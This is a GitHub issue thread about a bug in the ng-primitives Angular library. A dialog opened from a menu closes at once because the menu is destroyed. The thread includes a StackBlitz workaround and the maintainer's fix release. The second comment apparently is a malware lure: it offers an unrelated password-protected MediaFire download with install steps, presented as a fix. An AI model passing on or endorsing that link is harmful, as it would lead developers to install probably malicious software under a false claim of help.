### ISSUE TITLE
bug: `NgpDialogTrigger` inside a menu

### ISSUE THREAD

**Issue by gsiwiec01** [ng-primitives/ng-primitives#44]
### Affected Primitive

Dialog, Menu

### Version

0.75

### Bug Description

Embedding a `NgpDialogTrigger` inside a menu prevents the dialog from staying open. Essentially, the dialog does open, but at that moment the menu is destroyed, which causes the dialog to close immediately.

### Reproduction

https://stackblitz.com/edit/angular-wprwau?file=src%2Fmain.ts

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by benjaminforras** [comment]
This definitely looks like a bug to me.

Until this gets fixed here's a workaround: https://stackblitz.com/edit/angular-wprwau-yqi6kh?file=src%2Fmain.ts

**Comment by ashley-hunter** [comment]
@benjaminforras thank you very much for providing a workaround! 

I have just pushed the v0.7.7 release which should hopefully resolve this issue. Its a tricky one, but hopefully this resolves the issue, however if you encounter any further issues let me know! 

Thanks everyone!
